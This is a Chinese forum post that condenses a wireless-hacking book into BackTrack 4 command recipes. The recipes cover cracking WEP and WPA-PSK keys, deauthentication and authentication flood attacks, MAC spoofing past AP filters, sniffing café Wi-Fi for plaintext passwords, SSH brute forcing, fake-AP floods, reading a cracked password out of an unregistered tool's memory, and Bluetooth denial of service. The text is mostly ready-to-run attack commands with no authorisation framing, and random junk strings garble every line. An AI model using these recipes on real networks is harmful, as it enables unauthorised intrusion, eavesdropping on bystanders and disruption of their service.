少校
- 注册时间
- 2008-11-14
- 金币
- 2277 个
- 威望
- 7 个
- 荣誉
- 6 个
累计签到:14 天 连续签到:0 天 [LV.20]漫游旅程
|
这本书看了一个星期,终于看完了,现把书上的精华总结成如下内容,条理化知识点。; j0 [4 h+ C% G+ h+ v
: d3 Z9 f" h! ?. \) d以下所有操作均在BackTrack 4中进行。9 B7 e( q9 ~$ ~& N `' n
( `& \1 T m% O4 S9 m+ Y
( b0 E3 @/ o- V6 O% ~; ?8 ?+ J无线WEP加密P解:: O+ @7 u g- P f1 x9 b9 G) t
4 j4 m" `+ m! G; ?2 L0 k S7 b注入P解:% E/ M7 E3 V9 R% Z# o4 ]
& x/ n1 \0 a( gifconfig
. t4 I% u. L, X) Q
8 ]% K$ |' W8 }2 Xifconfig –a
1 c* L% p& N+ I" o4 i# n
U+ d4 W( ^5 ^+ }8 Gifconfig wlan0(无线网卡) up" X$ B* { L9 V: ]' m6 g2 M2 X' a1 T6 z
- B1 ~* \. a: Sairmon-ng start wlan0' `8 k5 ?5 n* h8 L4 E- I% h3 p" G
) W6 k6 I7 n2 C; p
airodump-ng mon0
5 @2 G: a, w/ F% P; p
" H6 X7 n8 ?3 f V2 r7 K7 w) qairodump-ng --ivs –w ivsfile –c 频道 mon0或' Q7 k$ c! T! T6 D
$ H) t2 B( t& J5 S- M, k7 \# Hairodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon02 k1 S7 O3 @7 \. Q
7 B8 o' o9 ?+ g. _4 |
aireplay-ng -3 –b BSSID –h Station mon0- a3 r. v: P- m5 n
: R/ j! ]. D& f( \* u8 C/ b
aircrack-ng ivsfile-01.ivs6 P6 B8 o2 `* m6 m
9 T0 |+ M/ e& q+ N
虚连接P解(适用于无客户端连接APP解)
+ q8 a) q/ C2 F" f
, o( s5 J4 [, ?% o4 t. ]; g6 `ifconfig
" k7 j- g0 A; }6 k$ H# l" v* J. u4 w/ @
ifconfig –a# U) C8 {5 B" `
8 f0 u( [- x# ~* W9 u, v1 ]. Gifconfig wlan0(无线网卡) up; `3 r9 {& U. Z2 _
1 o: g& p) t( e! uairmon-ng start wlan0
, J7 [ ` O, I+ ^) q3 x- i% G/ _" ^. j% D$ |
airodump-ng mon07 k! }" z( h" w8 e' i( [% d
6 B, t* u9 C6 Eairodump-ng --ivs –w ivsfile –c 频道 mon0或
. m! k' d. \* O4 f: U3 v( t" e% K
* s* u8 }( ~! h9 x4 oairodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon0: C* Q7 U0 Q4 V3 j) y. E
% _$ }9 |0 v N+ l, \2 k1 Daireplay-ng -1 0 –e SSID –a BSSID –c Station mon0* X3 j; J6 j: }1 z
@3 I- b" c5 h7 w3 laireplay-ng -2 –p 0841 –c ffffffffffff –b BSSID –h 自己的MAC mon0+ D# J- S( f( b3 d* ]
6 [' f$ z" q% G
aircrack-ng ivsfile-01.ivs
# ~: n) \3 t2 S Q O: G+ E& s- M; h2 Q e% U4 O
4 N! n/ f; L& z) u+ f! g+ C
还有傻瓜式P解软件SpoonWEP2,SpoonWEP2中的Chopchop和Fragment来进行无客户端P解,P解时客户端MAC栏留空。" M/ W- @, M" w: T0 Z6 ^- ?3 g
- D0 ^* d: T- e8 A) C
' c6 ^" F: N+ o$ K- j( O
WPA-PSKP解
; M$ v+ p$ M% E5 Y; _$ _: ]7 c% _: J9 W5 O+ c% I) K7 A4 o
ifconfig
: x1 a+ N0 v, R. S8 b: T& w8 w, K3 c' P# S3 n0 d9 b
ifconfig –a% z4 C; n% |; E4 j
; b% h; o2 }' c ?
ifconfig wlan0(无线网卡) up1 s' Z5 V# }3 G. g$ R, Q5 h3 L( f
* g; y8 m% |3 c
airmon-ng start wlan0
1 }3 m' q& j( ?9 I2 d+ x/ w* F
4 D6 |0 p; t9 G+ |% r: M# G1 k, Gairodump-ng mon0
, v7 t( @# l2 U* S6 o: B' b7 U- S9 |" v8 O6 P
airodump-ng –w capfile –c 频道 mon0
7 U! ^2 p% R6 ?) A& Y; h
2 K: I5 Z l0 o. s' `aireplay-ng -0 10 –a BSSID –c Station mon0 //Deauth洪水攻击使合法客户端掉线捕获其与AP连接时的握手数据包8 Y! Z+ \' U i; K* C$ _
0 l/ f. M3 J9 n8 r N
aircrack-ng –w Dic capfile-01.cap或: p8 u. s, S, G; |
' Q( w V h, H
cowpatty –f Dic –r capfile-01.cap –s SSID
/ I" W! g, r6 _4 T- ]; W( d! \7 n% e; ?3 c
cowpatty –d HashTable.Hash –r capfile-01.cap –s SSID0 ~! H& J0 _8 D' r: ?, t
5 e5 j( F( f' ~4 @
傻瓜式P解软件SpoonWPA。' w3 w/ l& V' R7 @" Z+ W. R
6 [& ~0 l. q: b& G9 dBT4下自带的字典文件:/pentest/passwords/wordlists/darkc0de.lst/ H% N6 v" o: Z3 {* u& k
# a+ _$ I q. H5 V! D8 n. M( B+ V0 {2 d9 z; B2 D9 q
字典文件的生成和上传; d9 g! m2 ^" V
5 n8 ^& b" _# N- O* U1 n
在windows下使用生日密码生成器和社会工程学密码生成器 等生成字典。然后在BT4下开启Tftp、SSH或使用U盘传输。5 `9 v7 k, c" i3 H+ k1 F# j
S$ \" p* B4 u/ |2 g+ |, L! o* `6 l p5 t
BT4下开启Tftp:Services—TFTPD—start TFTPD+ w* h' h% C' p) d4 f
8 p. [& k& @& _. A
在Windows的CMD中运行 tftp –i IP put **.dic
# L3 ~* w" O1 R3 u; j8 y8 D4 S& _& I/ |
0 ?( K! W: t$ A6 `' L; q/ p
BT4下开启SSH:Services—SSH—start SSH
3 ?, y' N- S% W/ [6 I; Y% J. t+ { S- ^% z0 ~* b4 r
Windows下使用CuteFTP新建连接:File--New—SFTP(SSH2)连接。使用BT4的root用户登录,前提是设置、修改密码:passwd root8 \* R! {% C$ q: x
* C4 W* H; m3 v7 Q2 ?2 l
# f0 G. c( m. g9 {9 b* oAP限制MAC时的解决. l9 L; c% A% r6 R4 T. N* `+ E
8 d- _& X' q4 m* P6 C
当AP限制IP连接时,可以伪造为合法用户的MAC,关于AP连接的用户以及MAC,可以使用airodump-ng mon0查看。在BT4下修改MAC的命令为:1 }+ Z3 x9 |6 C# T k+ o c9 W; u
2 @. q! [) {. `9 V$ L8 `) I
ifconfig wlan0 hw ether NewMAC
( `( O( f0 |7 A4 s4 X, h1 \1 e; b; [9 a6 u I9 s/ }' D
+ d! s, j1 V9 {关闭SSID广播的AP探测:2 Q, _/ G4 L. X3 l
4 i! R. ]$ M, ?9 ^( a; ]4 J9 c
1. Deauth攻击:% Q$ {' N4 W7 ~" O
0 O8 l; s3 x: J. y mairodump-ng mon0
3 Y% x8 Q0 U/ X5 ~: T" r) G
8 P4 o# x4 H% n7 \5 Aaireplay-ng -0 10 –a BSSID –h Station mon0% E) q1 G# y1 S+ i7 R4 Z
" F- W" W1 t& u% o
2. 抓包分析1 B7 H; O0 g5 q$ {% y2 Q
0 f m, a; e' O2 L! K! M4 q
Omnipeek
9 d3 _% ?& ~0 P5 l) m- `
" |! s6 a# { M. M% Q3 GTcpdump –n –e –vvv –i 网卡名+ r. m% Y" G( u+ V7 Y+ K- y
& T0 @* [1 L1 [3 m
3. 暴力P解
+ w4 s! A* L% B9 m$ s& C! d b {8 d* J- n6 O4 h
Charon 1.1暴力P解
7 Z0 `% R4 C6 \3 Y! D) P T3 x
! H& v/ |+ ?7 y0 ?, [: ^: J3 g6 D' o8 Q, k$ V7 ?
无线加密数据包的解密# e) [- d2 u q" R7 P
% D: t S& ~' e0 Q) l2 m
& h! D! v1 J- G1 {& g% q5 u; `$ i使用airodump-ng –w capfile –c 频道 mon0 捕获数据包并P解AP的密码 ,使用Cain的Cracker项在802.11Capturea导入解密。解密完后的数据包用Wireshark打开即可分析。
8 ~" P6 y, v7 k1 z
: k o. `) g- [- b4 KFilterNS DNS解析数据包
+ z3 {; v: `% F3 c! m. j3 m _5 j: N+ _" s
Filter:HTTP WEB访问数据包
7 O9 e- N( ~3 d1 d( |% \. Q% x$ t1 v; P5 D; y$ L
Filter:msnms MSN
( m: L3 J3 K4 W2 d6 E
# Q; I) o. M/ T; ~" aCtrl+F查找pass可以寻找一些明文的密码,如论坛等使用非SSL连接的账号。+ C# Y. n" O9 F' F7 y
! K+ ]9 g7 }( |" i2 B7 t) l" x使用airdecap-ng解密:1 t) B7 T0 k) O6 w" \; d' n
: E/ X) |$ S) F8 z* ~
Airdecap-ng –b BSSID –e SSID –w 密码 ***.cap
- S9 U9 U, X& |3 a1 N) _8 m
W; g3 t; b' _% X1 H8 e& e6 J. Q
8 u- u9 P% o; J$ `! P6 w/ W. b' T" @咖啡馆中无线数据截取(开放式无加密AP)
. N6 u T/ y" N" C5 f' o. E5 r& C5 V3 E1 {5 {4 a
1.Airodump-ng –w data –c频道 mon0' @/ U5 c7 B( Z) o+ x: y
- {4 _7 h- |; Y2 g. K; S2.使用WireShark打开分析
3 `- l2 R6 [) l6 W, k( h9 m0 M- Q+ S: L2 o7 Y2 c
( a7 M9 T# r) j( {. j/ e4 O6 ^0 N: K" g
BT4下的渗透工具:2 U9 E/ l5 ^6 S4 X) Z; L( z6 U
}% F( U2 s/ Y& k% E! knmap –sP IP/24 判断C段下存活的主机
: F2 G0 s: K' C, |2 ?+ _3 Z
$ N9 k' P! e) m! s9 Unmap –vv –sS IP/24 –p Port 扫描指定端口是否开放
. ^5 X N! j9 o: J& S& y/ T4 M# H% h) S+ o2 I. Y& c$ I
nmap –vv –sV IP –p port 指定端口的详细信息。。。
/ e: O$ k8 N( R; G! {5 O' y- o/ T; U, a
namp –O IP/24 判断主机的系统版本& S' n5 z, y" r) x5 U3 u+ s
! i/ W5 o8 i- ]) s$ m( V; y9 i! o6 Z) s
GUI 版nmap:Zenmap
* s: A) b$ ]; S! E& N L( }; t* d( G8 P5 v. K. j) ~9 L
4 _( `" q; f5 p4 I: \) {Amap使用:amap –B IP port
4 y# @8 G( Z! g2 U# ?3 {" L4 g. d' k6 ~' p5 P- J4 J& `+ l: \
Nbtscan(扫描Windows网络NetBios信息):
7 Z Y* G6 N% g c& D; ?, @" ]7 J
! E; J |8 x. t, B8 knbtscan –v –s : IP/24
$ j/ ^$ M: O1 ~% [
: j1 i+ l/ W/ w+ U' |) k. Rnbtscan –r IP# ]+ J: J: E* {
/ ?5 r0 N* w+ Y/ D1 Q' r+ T, q4 R/ D8 H! f6 }& |2 p
DNSWalk(指定域名的DNS探测):./dnswalk XXX.com.
% C7 P$ R* P! ]
6 N, U" } {6 ^4 n+ O) f' ~: K6 z" ?6 C% h" q/ T. I9 F
HydraP解工具(backtrack—Privilege Escalation—PasswordAttacks—OnlineAttacks)' F' s& R, _, ?5 J: O& k" `
$ W, X) H4 r7 h3 d
BruteSSH: ./bruthe.py –h IP –u Username –d Dic" W; v* O3 F f; a+ V3 m
D: J( y# l2 W! A) L
Metasploit3使用
8 w% q9 B; V8 V7 w+ T% U, Y无线D.0.S( O0 A$ y9 U& \2 O7 M
( B2 p; [" q; U( ]: s% j# S: \
" v0 ^3 M" l9 C# r" ZAuth Flood 攻击(Authentication Flood Attack,身份验证洪水攻击); u: e) c# J j7 ~
4 _6 q r' l8 Gairmon-ng start wlan0' J. y7 h; _: n) _9 ~
9 z6 R- P6 K4 B$ v8 pairodump-ng mon0* s) d4 @# w0 r( W$ Z
o% x! ~* O8 s5 O: Q' a7 m% c
mdk3 mon0 a –a BSSID" A8 a9 [& t) I* M/ w5 y
$ T- N4 v: j/ o: a% M' |对所有的AP攻击:mdk3 mon0 a
c* G U( e, R* }8 U
* i4 y0 Z/ Q& A# Y& M. Z
c4 p+ t& z; [% O* M0 NDeauth Flood 攻击5 A! v7 y% i: E9 Z/ p y
4 b5 E f+ y1 k, ?2 m: C( Q1 {$ [" Mmdk3 mon0 d –c Channel3 A% L+ K- y2 k0 q3 m# Z( Z
! w* [9 @9 F0 ~2 X! c" P% M
图形化D.O.S攻击:Charon
( ^% E4 Y( B+ x5 I8 Y1 {1 `7 ` ~- { L: S7 Z( ~, E* }
$ N* [! Q' @" K) P! V
当受到攻击时,使用Wireshark抓包可以看到异常信息。
: I% j6 e" o# }9 Q( I+ |2 _+ l
T$ z4 N5 ], g* G o
( u4 L- B0 ]. F+ s9 `" mWPA-PSK高速P解
! S' I/ {( `2 t S8 x) q( l; t
. T' ?- B. f' d2 x9 Z( c1. WPA-PSK PMK Hash TablesP解
2 ]" {. R$ Q& s! K8 j
! a# Z1 I" o. kCowpatty –d HashTable.hash –r ***.cap –s SSID! d1 k/ I! b9 f& _
- k% ]( U1 k/ \
Hash Tables的制作: genpmk –f Dic –d SaveHash –s SSID! A# l3 o# K+ l' v! K+ y
# d, C+ w9 I! h1 s2. GPU辅助高速P解. `- X5 Y1 g* b' d
& R/ w* r( w) U2 R
使用EWSA(Elcomsoft Wireless Security Auditor,无线安全审计工具)导入WPA握手数据包P解,未注册版P解后密码只显示2位,但是可以使用WinHex查看(ALT+F9)ewsa进程的内存,搜索 密码的前两位。就可以看到完整密码。" k" n6 ~5 R0 l1 t% s& H! W- K
3 b1 D; z/ ~ s8 K) Y
3. 分布式P解$ r5 [' |8 O, w0 o- [" `) M+ u
# Y# u, a% F0 ]$ d) }$ X2 ^: \% c9 S+ C9 J: T
AP的伪造+ k$ ]) w5 U$ ?: `
- o3 Z8 A& n5 ?5 _- G
把AP的MAC改成目标AP的MAC% o, `5 e( N) z" E/ Q4 m, {- o$ q
5 K. m8 I0 O8 m$ B8 t+ w网卡软AP; \$ O9 n* L: Y2 g
! Y8 \6 Z7 ^* V6 P& m6 S6 E1 W
# m# s) h. U& X' t/ T {
伪造大量虚假AP信号:3 u% f' q1 q, D7 O% H/ a# R: d
, Z! }5 p+ i4 @
随机SSID:mdk3 mon0 b –g –c 频道 " I; G- H. r: ~4 w% ~
+ M6 X+ H+ D$ M
指定SSID:mdk3 mon0 b –g –c 频道 –n SSID –s 速度: Y) n! i. q1 Z I. z5 f
[/ g* e- R2 z8 b
z9 @. W" K7 k* [1 C* |5 ]War-Driving# u3 n- d1 b( h8 S
L/ T& l6 T7 A
热点地图绘制. y6 M5 @' j( u
2 n2 N1 J5 t) G& W+ M' f# Y
Windows Mobile系统智能手机配合GPS模块,使用WIFifofum探测,把结果导出为kml(Google Earth可识别格式),在Google Earth中打开即可完成热点地图绘制。' N. r/ V1 [" f& {5 d% D B
9 |# t. z, U9 @" x) K3 p9 m A5 t. l0 w6 U- z- j# a4 x* ~ Y) S
Netstumble
$ w, c% X8 `. ^9 B3 n8 A
F4 Q/ W( }$ _ |( f# R6 h! }+ u' i9 V7 P+ G7 N5 G! K
蓝牙Hacking5 Q6 M: T) n Y% `
/ d8 \8 w* W6 ~3 fWindows下的Blue Soleil工具6 P7 s) X2 ]# _8 t
# \+ G0 s% m* O0 i' rBT4:
% [3 X+ M2 [' a8 E2 h) b- |5 n5 `& h6 ~1 D) E5 M9 `" ^
hciconfig 查看蓝牙适配器( E5 Z( ?2 ^6 c9 s/ P3 H
' J# L3 o! J4 r9 _hciconfig hci0 up 载入蓝牙适配器
& P5 t! X4 {; Q2 u
9 O6 O8 y% a0 C/ E1 Mhciconfig hci0 class 蓝牙适配器详细信息3 d1 e" b2 B0 ]# o: Z. U$ H
+ S* N% ?9 s) d) v( Z' [) B0 N8 X
4 ~) h. Q0 k( P, {3 o: Z- Ghcitool(扫描蓝牙)
, O- a8 K" R+ I7 c* E% w$ {1 T# l$ p/ P" ^9 w9 p
hcitool –i hci0 scan X1 Z) R; }, q; _
# p; _% [, S* y1 cBTscanner(扫描蓝牙)# K* s: `, ]6 L( L
; S* l: D$ E! n: b4 r
8 o% D6 C. T: s+ O
蓝牙攻击:
$ \8 z/ T! h" @% g: O3 c! v/ t2 [7 G& i& b k) K% y/ n) t( C
BlueBugging (适用于BlueTooth V1.1的手机)
2 f+ b) C9 _8 |2 l. \! k/ V4 T
7 Y) e: _# U) r0 HBluebugger工具:7 ?# i! M+ [: O; E# u" P
2 p/ a' c! {5 r; t, W+ b' ]/ d! A
Bulebugger –a HD_Addr info
6 n3 K$ b& g1 V* I O
% R& b+ W, g7 V
y0 S# ?/ W2 B2 W: {3 mBlueJacking8 a+ u: T! o# M, G3 X; i
; a0 T3 x1 w$ M, u; I# D4 M实现方法:使用手机伪造假的名片,里面写上消息内容然后发送。
$ E* \; W1 D3 w1 g3 P7 j( m
2 b: j2 i+ f5 k4 I* d: U
1 E, k+ P, [: Y F, q3 ^HD_Addr修改:+ M- H$ B+ |' ]' A d
: _: ]- ^) I0 U! ~
Bdaddr工具
* {1 t8 X& {: S6 L0 l) M
d/ { |* I, i3 F; N" ]bdaddr –i 蓝牙设备名 新HD_addr
: V5 R1 r% z- |+ X) T, j3 g+ w3 |7 d$ f$ N# p. R* P
) X% T \+ f7 D5 \" X1 J- o
蓝牙D.O.S' o8 z1 Z. `2 n6 ?0 k( S3 V" y
' d( R8 c0 ?! [6 q; u* P7 w
l2ping工具(蓝牙连通性测试工具),改变其发包数据包大小,使目标设备拒绝服务7 ]2 P! F0 f, I2 l3 H1 T; [
: [, Y" a2 H- ?0 L# p
hciconfig% ~. J& [8 r% D% s. I5 A
" B3 C1 n5 i( u( Y6 T+ ~1 Vhciconfig hci0 up
; ~4 u K6 K; c$ _! g6 m. P& t0 `# e! C6 ~% x, S
hcitool –i hci0 scan/ Q% z$ z: ~3 u" G5 @; C
5 D7 k' [* r* L D' Z: k4 B
l2ping –s 10000 –目标MAC' X: b! q1 k1 ^$ O( d5 l* Q2 u
- B* v6 w8 p: M/ `6 `% Z& E6 l% [9 ?, e l+ m
不可见状态的蓝牙通过RedFang暴力P解(暴力尝试所有的HD_Addr)(概念性的软件)
# d+ G% F1 S" {: M# U$ B5 O$ n) a: _1 |. {5 j( Z
./fang –r ************-############ -s
" V+ q1 e! }. q9 @4 E
$ {2 N0 M2 Y, l5 u# X2 I- R( o; h暴力P解************-############的蓝牙设备1 k7 Z! \& P. y* C4 Z
8 F* n5 p% j/ [1 y( p+ \4 i1 _./fang –l 各厂商BD_Addr分配+ g7 X7 i1 ~ P) ~% P
" I( F6 ~ p/ s& _6 E/ K3 U" `" m3 \9 r! D
WifiZoo使用6 U( p, \' d5 q1 a- k; f4 F
* Z, Z. I+ t: \
./wifizoo.py –c Capfile8 g: K9 S* r y: L
, P; \6 {% P; }- V/ o3 v- t4 M: A7 C
访问127.0.0.1:8000即可登录Wifizoo管理页面,查看数据包分析的详情 |
评分
-
2
查看全部评分
-
|